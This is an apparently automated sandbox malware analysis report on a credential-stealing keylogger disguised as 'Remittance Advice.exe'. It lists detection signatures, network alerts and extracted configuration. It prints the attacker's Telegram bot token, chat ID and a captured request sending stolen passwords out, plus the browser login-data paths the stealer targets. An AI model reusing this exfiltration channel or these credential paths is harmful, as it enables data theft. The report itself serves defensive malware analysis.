Edit tour

Windows Analysis Report
Remittance Advice.exe

Overview

General Information

Sample name:	Remittance Advice.exe
Analysis ID:	1589988
MD5:	667efc5a5ac024a15ce73a7a352ea598
SHA1:	8b040298902662570d584fc468c8f45f35c47396
SHA256:	98bd32336d5f7ccc755b7957803a881a51dafb9efad7d577befc431690469787
Tags:	exeMassLoggeruser-adrian__luca
Infos:

Detection

MassLogger RAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected MassLogger RAT

Yara detected Telegram RAT

AI detected suspicious sample

Machine Learning detection for sample

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

Remittance Advice.exe (PID: 4664 cmdline: "C:\Users\user\Desktop\Remittance Advice.exe" MD5: 667EFC5A5AC024A15CE73A7A352EA598)

RegAsm.exe (PID: 7068 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

cleanup

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7509254516:AAFxIBKNWOsbZgg7R0G5UXoQxmBr0fBQkf8/sendMessage"}

Threatname: MassLogger

{"EXfil Mode": "Telegram", "Telegram Token": "7509254516:AAFxIBKNWOsbZgg7R0G5UXoQxmBr0fBQkf8", "Telegram Chatid": "6410945890"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000002.3924616113.0000000000632000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000003.00000002.3924616113.0000000000632000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.3924616113.0000000000632000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000003.00000002.3924616113.0000000000632000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xefb7:$a1: get_encryptedPassword 0xf2df:$a2: get_encryptedUsername 0xed52:$a3: get_timePasswordChanged 0xee73:$a4: get_passwordField 0xefcd:$a5: set_encryptedPassword 0x10929:$a7: get_logins 0x105da:$a8: GetOutlookPasswords 0x103cc:$a9: StartKeylogger 0x10879:$a10: KeyLoggerEventArgs 0x10429:$a11: KeyLoggerEventArgsEventHandler
00000003.00000002.3925485260.0000000002706000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000003.00000002.3925485260.0000000002706000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.3925485260.0000000002706000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.1452832987.0000000004239000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000000.00000002.1452832987.0000000004239000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1452832987.0000000004239000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.1452832987.0000000004239000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xa43d7:$a1: get_encryptedPassword 0xbb207:$a1: get_encryptedPassword 0xd1e27:$a1: get_encryptedPassword 0xa46ff:$a2: get_encryptedUsername 0xbb52f:$a2: get_encryptedUsername 0xd214f:$a2: get_encryptedUsername 0xa4172:$a3: get_timePasswordChanged 0xbafa2:$a3: get_timePasswordChanged 0xd1bc2:$a3: get_timePasswordChanged 0xa4293:$a4: get_passwordField 0xbb0c3:$a4: get_passwordField 0xd1ce3:$a4: get_passwordField 0xa43ed:$a5: set_encryptedPassword 0xbb21d:$a5: set_encryptedPassword 0xd1e3d:$a5: set_encryptedPassword 0xa5d49:$a7: get_logins 0xbcb79:$a7: get_logins 0xd3799:$a7: get_logins 0xa59fa:$a8: GetOutlookPasswords 0xbc82a:$a8: GetOutlookPasswords 0xd344a:$a8: GetOutlookPasswords
Process Memory Space: Remittance Advice.exe PID: 4664	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: Remittance Advice.exe PID: 4664	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Remittance Advice.exe PID: 4664	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Remittance Advice.exe PID: 4664	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: Remittance Advice.exe PID: 4664	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3d262:$a1: get_encryptedPassword 0x3d4fd:$a2: get_encryptedUsername 0x3d01e:$a3: get_timePasswordChanged 0x3d132:$a4: get_passwordField 0x3d278:$a5: set_encryptedPassword 0x3e713:$a7: get_logins 0x3e441:$a8: GetOutlookPasswords 0x3e27b:$a9: StartKeylogger 0x3e678:$a10: KeyLoggerEventArgs 0x3e2d8:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: RegAsm.exe PID: 7068	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: RegAsm.exe PID: 7068	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 7068	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: RegAsm.exe PID: 7068	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x54a63:$a1: get_encryptedPassword 0x54d7c:$a2: get_encryptedUsername 0x54812:$a3: get_timePasswordChanged 0x54933:$a4: get_passwordField 0x54a79:$a5: set_encryptedPassword 0x5637c:$a7: get_logins 0x5602d:$a8: GetOutlookPasswords 0x55e1f:$a9: StartKeylogger 0x562cc:$a10: KeyLoggerEventArgs 0x55e7c:$a11: KeyLoggerEventArgsEventHandler
Click to see the 15 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
3.2.RegAsm.exe.630000.0.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
3.2.RegAsm.exe.630000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.RegAsm.exe.630000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
3.2.RegAsm.exe.630000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xf1b7:$a1: get_encryptedPassword 0xf4df:$a2: get_encryptedUsername 0xef52:$a3: get_timePasswordChanged 0xf073:$a4: get_passwordField 0xf1cd:$a5: set_encryptedPassword 0x10b29:$a7: get_logins 0x107da:$a8: GetOutlookPasswords 0x105cc:$a9: StartKeylogger 0x10a79:$a10: KeyLoggerEventArgs 0x10629:$a11: KeyLoggerEventArgsEventHandler
3.2.RegAsm.exe.630000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x14163:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x13661:$a3: \Google\Chrome\User Data\Default\Login Data 0x1396f:$a4: \Orbitum\User Data\Default\Login Data 0x14767:$a5: \Kometa\User Data\Default\Login Data
0.2.Remittance Advice.exe.42ce220.3.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
0.2.Remittance Advice.exe.42ce220.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Remittance Advice.exe.42ce220.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.Remittance Advice.exe.42ce220.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xd3b7:$a1: get_encryptedPassword 0xd6df:$a2: get_encryptedUsername 0xd152:$a3: get_timePasswordChanged 0xd273:$a4: get_passwordField 0xd3cd:$a5: set_encryptedPassword 0xed29:$a7: get_logins 0xe9da:$a8: GetOutlookPasswords 0xe7cc:$a9: StartKeylogger 0xec79:$a10: KeyLoggerEventArgs 0xe829:$a11: KeyLoggerEventArgsEventHandler
0.2.Remittance Advice.exe.42ce220.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x12363:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x11861:$a3: \Google\Chrome\User Data\Default\Login Data 0x11b6f:$a4: \Orbitum\User Data\Default\Login Data 0x12967:$a5: \Kometa\User Data\Default\Login Data
0.2.Remittance Advice.exe.42ce220.3.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
0.2.Remittance Advice.exe.42ce220.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Remittance Advice.exe.42ce220.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.Remittance Advice.exe.42ce220.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xf1b7:$a1: get_encryptedPassword 0x25fe7:$a1: get_encryptedPassword 0x3cc07:$a1: get_encryptedPassword 0xf4df:$a2: get_encryptedUsername 0x2630f:$a2: get_encryptedUsername 0x3cf2f:$a2: get_encryptedUsername 0xef52:$a3: get_timePasswordChanged 0x25d82:$a3: get_timePasswordChanged 0x3c9a2:$a3: get_timePasswordChanged 0xf073:$a4: get_passwordField 0x25ea3:$a4: get_passwordField 0x3cac3:$a4: get_passwordField 0xf1cd:$a5: set_encryptedPassword 0x25ffd:$a5: set_encryptedPassword 0x3cc1d:$a5: set_encryptedPassword 0x10b29:$a7: get_logins 0x27959:$a7: get_logins 0x3e579:$a7: get_logins 0x107da:$a8: GetOutlookPasswords 0x2760a:$a8: GetOutlookPasswords 0x3e22a:$a8: GetOutlookPasswords
0.2.Remittance Advice.exe.42ce220.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x14163:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x2af93:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x41bb3:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x13661:$a3: \Google\Chrome\User Data\Default\Login Data 0x2a491:$a3: \Google\Chrome\User Data\Default\Login Data 0x410b1:$a3: \Google\Chrome\User Data\Default\Login Data 0x1396f:$a4: \Orbitum\User Data\Default\Login Data 0x2a79f:$a4: \Orbitum\User Data\Default\Login Data 0x413bf:$a4: \Orbitum\User Data\Default\Login Data 0x14767:$a5: \Kometa\User Data\Default\Login Data 0x2b597:$a5: \Kometa\User Data\Default\Login Data 0x421b7:$a5: \Kometa\User Data\Default\Login Data
0.2.Remittance Advice.exe.428d1b0.2.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
0.2.Remittance Advice.exe.428d1b0.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Remittance Advice.exe.428d1b0.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.Remittance Advice.exe.428d1b0.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x50227:$a1: get_encryptedPassword 0x67057:$a1: get_encryptedPassword 0x7dc77:$a1: get_encryptedPassword 0x5054f:$a2: get_encryptedUsername 0x6737f:$a2: get_encryptedUsername 0x7df9f:$a2: get_encryptedUsername 0x4ffc2:$a3: get_timePasswordChanged 0x66df2:$a3: get_timePasswordChanged 0x7da12:$a3: get_timePasswordChanged 0x500e3:$a4: get_passwordField 0x66f13:$a4: get_passwordField 0x7db33:$a4: get_passwordField 0x5023d:$a5: set_encryptedPassword 0x6706d:$a5: set_encryptedPassword 0x7dc8d:$a5: set_encryptedPassword 0x51b99:$a7: get_logins 0x689c9:$a7: get_logins 0x7f5e9:$a7: get_logins 0x5184a:$a8: GetOutlookPasswords 0x6867a:$a8: GetOutlookPasswords 0x7f29a:$a8: GetOutlookPasswords
0.2.Remittance Advice.exe.428d1b0.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x551d3:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x6c003:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x82c23:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x546d1:$a3: \Google\Chrome\User Data\Default\Login Data 0x6b501:$a3: \Google\Chrome\User Data\Default\Login Data 0x82121:$a3: \Google\Chrome\User Data\Default\Login Data 0x549df:$a4: \Orbitum\User Data\Default\Login Data 0x6b80f:$a4: \Orbitum\User Data\Default\Login Data 0x8242f:$a4: \Orbitum\User Data\Default\Login Data 0x557d7:$a5: \Kometa\User Data\Default\Login Data 0x6c607:$a5: \Kometa\User Data\Default\Login Data 0x83227:$a5: \Kometa\User Data\Default\Login Data
0.2.Remittance Advice.exe.4263380.4.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
0.2.Remittance Advice.exe.4263380.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Remittance Advice.exe.4263380.4.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.Remittance Advice.exe.4263380.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x7a057:$a1: get_encryptedPassword 0x90e87:$a1: get_encryptedPassword 0xa7aa7:$a1: get_encryptedPassword 0x7a37f:$a2: get_encryptedUsername 0x911af:$a2: get_encryptedUsername 0xa7dcf:$a2: get_encryptedUsername 0x79df2:$a3: get_timePasswordChanged 0x90c22:$a3: get_timePasswordChanged 0xa7842:$a3: get_timePasswordChanged 0x79f13:$a4: get_passwordField 0x90d43:$a4: get_passwordField 0xa7963:$a4: get_passwordField 0x7a06d:$a5: set_encryptedPassword 0x90e9d:$a5: set_encryptedPassword 0xa7abd:$a5: set_encryptedPassword 0x7b9c9:$a7: get_logins 0x927f9:$a7: get_logins 0xa9419:$a7: get_logins 0x7b67a:$a8: GetOutlookPasswords 0x924aa:$a8: GetOutlookPasswords 0xa90ca:$a8: GetOutlookPasswords
0.2.Remittance Advice.exe.4263380.4.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x7f003:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x95e33:$a2: \Comodo\Dragon\User Data\Default\Login Data 0xaca53:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x7e501:$a3: \Google\Chrome\User Data\Default\Login Data 0x95331:$a3: \Google\Chrome\User Data\Default\Login Data 0xabf51:$a3: \Google\Chrome\User Data\Default\Login Data 0x7e80f:$a4: \Orbitum\User Data\Default\Login Data 0x9563f:$a4: \Orbitum\User Data\Default\Login Data 0xac25f:$a4: \Orbitum\User Data\Default\Login Data 0x7f607:$a5: \Kometa\User Data\Default\Login Data 0x96437:$a5: \Kometa\User Data\Default\Login Data 0xad057:$a5: \Kometa\User Data\Default\Login Data
Click to see the 20 entries

Suricata Signatures

ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-13T13:05:39.008817+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.7	49712	149.154.167.220	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-13T13:05:31.839208+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49707	193.122.130.0	80	TCP
2025-01-13T13:05:38.057995+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49707	193.122.130.0	80	TCP

Joe Security ANOMALY Telegram Send File

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-13T13:05:38.767563+0100	1810008	1	Potentially Bad Traffic	192.168.2.7	49712	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Remittance Advice.exe

Avira: detected

Found malware configuration

Source: 00000003.00000002.3925485260.0000000002706000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7509254516:AAFxIBKNWOsbZgg7R0G5UXoQxmBr0fBQkf8", "Telegram Chatid": "6410945890"}
Source: RegAsm.exe.7068.3.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7509254516:AAFxIBKNWOsbZgg7R0G5UXoQxmBr0fBQkf8/sendMessage"}

Multi AV Scanner detection for submitted file

Source: Remittance Advice.exe	Virustotal: Detection: 73%			Perma Link
Source: Remittance Advice.exe	ReversingLabs: Detection: 73%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: Remittance Advice.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: Remittance Advice.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.7:49708 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49712 version: TLS 1.2

Source: Remittance Advice.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:

Binary string: G:\IMPORTANT SRC\GOOD Nova\Crypter\Stubs Fully\Public\Public Runpe\PR\PR\obj\Debug\Poses.pdb source: Remittance Advice.exe, 00000000.00000002.1452750531.0000000003231000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 009E5782h	3_2_009E5367
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 009E51B9h	3_2_009E4F08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp 009E5782h	3_2_009E56AF

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:49712 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.7:49712 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7509254516:AAFxIBKNWOsbZgg7R0G5UXoQxmBr0fBQkf8/sendDocument?chat_id=6410945890&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd33a0aebb4d1aHost: api.telegram.orgContent-Length: 1088Connection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 104.21.32.1 104.21.32.1
Source: Joe Sandbox View	IP Address: 104.21.32.1 104.21.32.1
Source: Joe Sandbox View	IP Address: 193.122.130.0 193.122.130.0

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic

Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49707 -> 193.122.130.0:80

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: unknown

HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.7:49708 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown

HTTP traffic detected: POST /bot7509254516:AAFxIBKNWOsbZgg7R0G5UXoQxmBr0fBQkf8/sendDocument?chat_id=6410945890&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd33a0aebb4d1aHost: api.telegram.orgContent-Length: 1088Connection: Keep-Alive

Source: RegAsm.exe, 00000003.00000002.3925485260.0000000002706000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: RegAsm.exe, 00000003.00000002.3925485260.0000000002706000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.orgd
Source: RegAsm.exe, 00000003.00000002.3925485260.0000000002630000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: RegAsm.exe, 00000003.00000002.3925485260.0000000002630000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.comd
Source: RegAsm.exe, 00000003.00000002.3925485260.0000000002630000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3925485260.000000000261E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3925485260.0000000002706000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: RegAsm.exe, 00000003.00000002.3925485260.00000000025B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: RegAsm.exe, 00000003.00000002.3925485260.0000000002630000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3925485260.0000000002706000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/d
Source: Remittance Advice.exe, 00000000.00000002.1452832987.0000000004239000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3924616113.0000000000632000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: RegAsm.exe, 00000003.00000002.3925485260.0000000002630000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.orgd
Source: RegAsm.exe, 00000003.00000002.3925485260.000000000264D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: RegAsm.exe, 00000003.00000002.3925485260.000000000264D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.orgd
Source: RegAsm.exe, 00000003.00000002.3925485260.00000000025B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegAsm.exe, 00000003.00000002.3925485260.0000000002706000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: RegAsm.exe, 00000003.00000002.3925485260.0000000002706000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: Remittance Advice.exe, 00000000.00000002.1452832987.0000000004239000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3924616113.0000000000632000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
Source: RegAsm.exe, 00000003.00000002.3925485260.0000000002706000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7509254516:AAFxIBKNWOsbZgg7R0G5UXoQxmBr0fBQkf8/sendDocument?chat_id=6410
Source: RegAsm.exe, 00000003.00000002.3925485260.0000000002630000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: Remittance Advice.exe, 00000000.00000002.1452832987.0000000004239000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3925485260.0000000002630000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3924616113.0000000000632000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: RegAsm.exe, 00000003.00000002.3925485260.0000000002630000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189d
Source: RegAsm.exe, 00000003.00000002.3925485260.0000000002630000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189l

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49712 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 3.2.RegAsm.exe.630000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.RegAsm.exe.630000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.Remittance Advice.exe.42ce220.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Remittance Advice.exe.42ce220.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.Remittance Advice.exe.42ce220.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Remittance Advice.exe.42ce220.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.Remittance Advice.exe.428d1b0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Remittance Advice.exe.428d1b0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.Remittance Advice.exe.4263380.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Remittance Advice.exe.4263380.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000003.00000002.3924616113.0000000000632000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1452832987.0000000004239000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: Remittance Advice.exe PID: 4664, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
